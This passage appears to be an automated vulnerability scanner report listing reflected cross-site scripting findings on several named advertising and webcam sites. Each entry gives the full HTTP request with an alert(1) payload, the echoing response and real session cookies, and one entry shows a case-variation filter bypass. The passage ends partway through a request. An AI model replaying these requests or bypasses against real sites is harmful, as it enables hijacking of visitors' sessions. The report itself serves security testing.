Path:	/tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2be2a'%3balert(1)//1e4afaaa4ee was submitted in the h parameter. This input was echoed as 2be2a';alert(1)//1e4afaaa4ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tag.jsp?pid=0CC81D8&w=300&h=2502be2a'%3balert(1)//1e4afaaa4ee&rnd= HTTP/1.1
Host: ads.roiserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Fri, 28 Jan 2011 16:44:01 GMT
Connection: close

var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=0CC81D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="2502be2a';alert(1)//1e4afaaa4ee" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.148. http://ads.roiserver.com/tag.jsp [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.roiserver.com
Path:	/tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90072"%3balert(1)//78cfa7c28ea was submitted in the pid parameter. This input was echoed as 90072";alert(1)//78cfa7c28ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tag.jsp?pid=0CC81D890072"%3balert(1)//78cfa7c28ea&w=300&h=250&rnd= HTTP/1.1
Host: ads.roiserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Fri, 28 Jan 2011 16:43:59 GMT
Connection: close

var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=0CC81D890072";alert(1)//78cfa7c28ea&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.149. http://ads.roiserver.com/tag.jsp [w parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.roiserver.com
Path:	/tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c51d0'%3balert(1)//00d506c594f was submitted in the w parameter. This input was echoed as c51d0';alert(1)//00d506c594f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tag.jsp?pid=0CC81D8&w=300c51d0'%3balert(1)//00d506c594f&h=250&rnd= HTTP/1.1
Host: ads.roiserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Fri, 28 Jan 2011 16:44:00 GMT
Connection: close

var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=0CC81D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300c51d0';alert(1)//00d506c594f" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.150. http://adsfac.us/ag.asp [cc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload ddf63<script>alert(1)</script>8c447564c06 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=ddf63<script>alert(1)</script>8c447564c06&source=js&ord=5596043 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sat, 29 Jan 2011 01:55:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c060=uid=10961381; expires=Sun, 30-Jan-2011 01:56:08 GMT; path=/
Set-Cookie: FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c06=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4045&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Tue, 01-Mar-2011 01:56:08 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 29 Jan 2011 01:56:07 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=ddf63<script>alert(1)</script>8c447564c06.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

4.151. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3ce'-alert(1)-'6c601d061a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?5b3ce'-alert(1)-'6c601d061a=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vc4twg45dvbaxrjcyazsha21; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=vc4twg45dvbaxrjcyazsha21; path=/; HttpOnly
Set-Cookie: spvdr=vd=403fb166-4a3b-49a4-b9e2-7da3ff9f4dd9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:45 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:45 GMT
Connection: close
Content-Length: 19131
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ar.imlive.com&ul=/?5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&iy=dallas&id=44&iu=1&vd=403fb166-4a3b-49a4-b9e2-7da3ff9f4dd9';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv
...[SNIP]...

4.152. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26eb"><script>alert(1)</script>f467ed2684e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b26eb"><script>alert(1)</script>f467ed2684e=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:27 GMT
Connection: close
Content-Length: 21363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?b26eb"><script>alert(1)</script>f467ed2684e=1');return false;">
...[SNIP]...

4.153. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fqzehq45mvboz255wmce5e45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fqzehq45mvboz255wmce5e45; path=/; HttpOnly
Set-Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:44 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:43 GMT
Connection: close
Content-Length: 19557
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||94ad3"><script>alert(1)</script>4f479a42c47~1');return false;">
...[SNIP]...

4.154. http://ar.imlive.com/waccess/ [cbname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f889"><script>alert(1)</script>305652e0e15 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:36 GMT
Connection: close
Content-Length: 23511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.155. http://ar.imlive.com/waccess/ [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 650a2"><script>alert(1)</script>068f5418f8 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:40 GMT
Connection: close
Content-Length: 23490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.156. http://ar.imlive.com/waccess/ [promocode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d88"><script>alert(1)</script>5d1a3a1c243 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:33 GMT
Connection: close
Content-Length: 23511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.157. http://ar.voicefive.com/b/rc.pli [func parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload eb6b5<script>alert(1)</script>fdda9ab7c58 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractioneb6b5<script>alert(1)</script>fdda9ab7c58&n=ar_int_p85001580&1296224152232 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:20 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractioneb6b5<script>alert(1)</script>fdda9ab7c58("");

4.158. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload 9c80e<script>alert(1)</script>2ca5504680a was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=404017409c80e<script>alert(1)</script>2ca5504680a HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:22 2011&prad=58087481&arc=404017409c80e%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ca5504680a&; expires=Thu 28-Apr-2011 16:37:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26516

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"404017409c80e<script>alert(1)</script>2ca5504680a",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("404017409c80e<script>
...[SNIP]...

4.159. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload 25b4d<script>alert(1)</script>955dc17c970 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=5808748125b4d<script>alert(1)</script>955dc17c970&AR_C=40401349 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
